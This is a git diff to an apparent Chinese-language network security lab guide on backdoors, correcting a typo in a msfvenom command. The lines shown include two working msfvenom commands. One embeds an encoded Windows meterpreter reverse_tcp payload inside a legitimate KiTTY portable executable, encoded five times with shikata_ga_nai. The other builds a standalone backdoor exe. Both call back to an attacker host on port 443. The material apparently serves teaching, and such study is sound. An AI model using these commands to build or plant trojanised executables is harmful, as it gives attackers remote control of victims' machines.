diff --git "a/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" "b/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" index ad46c1b8fe151cb9a3ee10a25084d25dc74ef92a..f10aa45266ba911f6ef289d1dcf03c65d66eff9c 100644 --- "a/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" +++ "b/ExpGuides/0x21_MAL_\345\220\216\351\227\250\345\216\237\347\220\206\344\270\216\345\256\236\350\267\265.md" @@ -343,7 +343,7 @@ windows版见[附件](http://git.oschina.net/wildlinux/NetSec/attach_files)。 root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe *** 或者简单点 *** -root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe +root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 LPORT=443 -f exe > meter_backdoor.exe ```